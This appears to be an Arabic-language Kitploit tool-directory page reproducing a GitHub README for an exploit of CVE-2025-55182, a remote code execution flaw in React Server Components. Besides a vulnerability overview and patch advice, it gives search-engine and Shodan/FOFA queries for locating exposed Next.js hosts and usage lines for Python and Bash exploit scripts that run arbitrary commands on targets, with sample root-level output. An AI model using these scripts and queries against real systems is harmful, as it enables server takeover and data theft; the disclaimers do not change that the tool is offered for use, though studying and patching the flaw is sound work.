Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على تنفيذ مكونات خادم React (RSC) ضمن حزم متعددة تشمل. | Kitploit
أدوات/GitHubGitHub/cyberleelawat/cve-2025-55182
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على تنفيذ مكونات خادم React (RSC) ضمن حزم متعددة تشمل.

عرض المستودع
11منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 – تنفيذ تعليمات برمجية عن بُعد في مكونات خادم React

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

أنشأ بواسطة : فيريندرا كومار

الشركة : Cyber Leelawat

الموقع :

www.cyberleelawat.in

نظرة عامة

CVE-2025-55182 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على تنفيذ مكونات خادم React (RSC) في حزم متعددة تشمل:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

توجد الثغرة بسبب إلغاء التسلسل غير الآمن للبيانات المرسلة عبر بروتوكول Flight الداخلي المستخدم من قبل RSC. عندما تمر مدخلات غير موثوقة معينة عبر مكونات خادم React عبر طلبات HTTP، قد يتم تشغيل تنفيذ تعليمات برمجية من جانب الخادم.

الإصدارات المتأثرة تشمل:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

الإصدارات المُصحّحة تشمل:

  • 19.0.1
  • 19.1.2
  • 19.2.1

كيفية عمل الثغرة (على مستوى عالٍ)

تقبل مكونات خادم React طلبات من جانب العميل يتم تحليلها وإلغاء تسلسلها في الواجهة الخلفية. تنشأ الثغرة من عناصر تحكم غير كافية حول إلغاء تسلسل البيانات الواردة، مما يسمح بتفسير الحمولات المصممة خصيصًا كمكونات قابلة للتنفيذ من جانب الخادم.

عند حدوث ذلك، قد يحدث تنفيذ عشوائي لجافا سكريبت على الخادم، مما قد يؤدي إلى اختراق كامل للخادم اعتمادًا على بيئة الاستضافة والصلاحيات.


السبب الجذري

  • نقص التحقق المناسب من المدخلات في تدفقات بروتوكول RSC Flight.
  • حد الثقة في الخادم تم افتراضه آمنًا بشكل غير صحيح.
  • تحليل غير آمن من جانب الخادم لمدخلات مستخدم غير موثوقة.

التأثير

إذا تم استغلالها، قد يتمكن المهاجم من:

  • تحقيق تنفيذ تعليمات برمجية عن بُعد
  • تنفيذ أوامر عشوائية من جانب الخادم
  • الوصول إلى قاعدة البيانات أو موارد نظام التشغيل
  • تثبيت برمجيات خبيثة أو أبواب خلفية
  • سرقة بيانات حساسة
  • القيام بحركة جانبية داخل البنية التحتية

نقاط CVSS: 10.0 – حرجة


الاختبار اليدوي (التعريف الدفاعي الآمن)

الهدف الأساسي:

التحقق مما إذا كان التطبيق يعرض مكونات خادم React وما إذا كانت الإصدارات المتأثرة قيد الاستخدام.

الخطوة 1 — التحقق من وجود RSC عبر خصائص الاستجابة

root@kitploit:~
curl -I https://target.com/?__rsc=1

استطلاع Google (كلمات مفتاحية دفاعية)

تساعد هذه الكلمات المفتاحية في تحديد ما إذا كان مستودع عام أو تطبيق ويب يشير إلى مكونات RSC.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

تحقق:

  • هل توجد ميزات RSC؟
  • هل الحزم مرئية في حزم الواجهة الأمامية؟
  • هل هناك مراجع Git عامة؟

أمثلة استعلامات Google داخلية (نطاقك الخاص فقط)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

مخصص للتدقيق الداخلي لنطاق مؤسستك فقط.


Shodan (بصمة تقنية آمنة)

تحقق من استخدام الإطار المكشوف، وليس استغلال الثغرات.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

تصنيف تقنية FOFA فقط

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

الاختبار الآلي (داخلي / معمل)

لأتمتة المسح الدفاعي، استنسخ منطق الكشف القائم على القوالب لتقييم البنية التحتية الخاصة بك:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

قالب Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

استغلال Python RCE (CVE-2025-55182.py)

نص استغلال RCE كامل الميزات ينفذ أوامر عشوائية ويسترد المخرجات.

الاستخدام:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

استغلال Bash

التثبيت

root@kitploit:~
chmod +x scanner.sh

الاستخدام

root@kitploit:~
# المسح باستخدام الأمر الافتراضي (id)
./scanner.sh -d example.com

# تنفيذ أمر مخصص
./scanner.sh -d example.com -c "whoami"

# مع رابط كامل
./scanner.sh -d https://example.com -c "uname -a"

الخيارات

  • -d, --domain - المجال/الرابط المستهدف (مطلوب)
  • -c, --command - الأمر المراد تنفيذه (الافتراضي: id)

أمثلة

root@kitploit:~
# التحقق مما إذا كان الهدف ضعيفًا
./scanner.sh -d vulnerable-app.com

# الحصول على معلومات النظام
./scanner.sh -d vulnerable-app.com -c "uname -a"

# عرض الملفات
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

المتطلبات

  • Bash

  • curl

  • openssl

    إشادة: تم إنشاء نص Bash و Python أصلاً بواسطة @zack0x01 و @sickwell. يُستخدم مع التقدير.

القوالب داخل المستودع مخصصة لـ:

  • تحديد الإصدار
  • فحوصات الرؤية
  • جرد البنية التحتية
  • الوعي بالثغرات

مهم: يجب تنفيذ هذه القوالب فقط على الأنظمة التي تملكها أو مخول بتقييمها.


Nuclei (بيان الاستخدام الدفاعي)

قوالب Nuclei المضمنة في هذا المستودع مخصصة فقط لـ:

  • التحقق من إصدار التبعيات
  • البصمة غير المباشرة
  • الفحوصات السلبية
  • التدقيق الأمني الداخلي

يرجى التأكد من:

  • لديك إذن كتابي
  • تقوم بمسح أصولك الخاصة فقط
  • تلتزم بالقوانين والسياسات المحلية

التخفيفات الموصى بها

التحديث فورًا

قم بالترقية إلى أحد الإصدارات المُصحّحة:

  • 19.0.1
  • 19.1.2
  • 19.2.1

إذا لم تتمكن من التصحيح فورًا

  • تعطيل ميزات RSC مؤقتًا
  • عزل مكونات الخادم
  • تنفيذ قواعد WAF
  • تقليل سطح الشبكة المكشوف

🤝 تواصل معي

👨‍💻 Cyber Leelawat

باحث أمني • مدرب أمن سيبراني • صائد ثغرات

الشعار: Zero Trust Full Secure 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

الخاتمة

CVE-2025-55182 هي حاليًا واحدة من أكثر التهديدات خطورة للبنى التحتية القائمة على React. نظرًا لسهولة ناقل الاستغلال وسطح الهجوم غير المصادق عليه، يُنصح بشدة بالتصحيح الفوري. أي مؤسسة تدير إصدارات RSC متأثرة يجب أن تنظر في الأولوية الطارئة.


إشعار قانوني / أخلاقي

هذا المستودع والوثائق مخصصان للبحث الدفاعي والتحقق الأمني للأصول التي تملكها. أي سوء استخدام قد يكون غير قانوني. أنت مسؤول عن الامتثال للقوانين والسياسات التنظيمية.

تم إنشاؤه بـ ❤️ بواسطة Cyber Leelawat

Zero Trust Full Secure 🎯🔐

تنزيل الأداة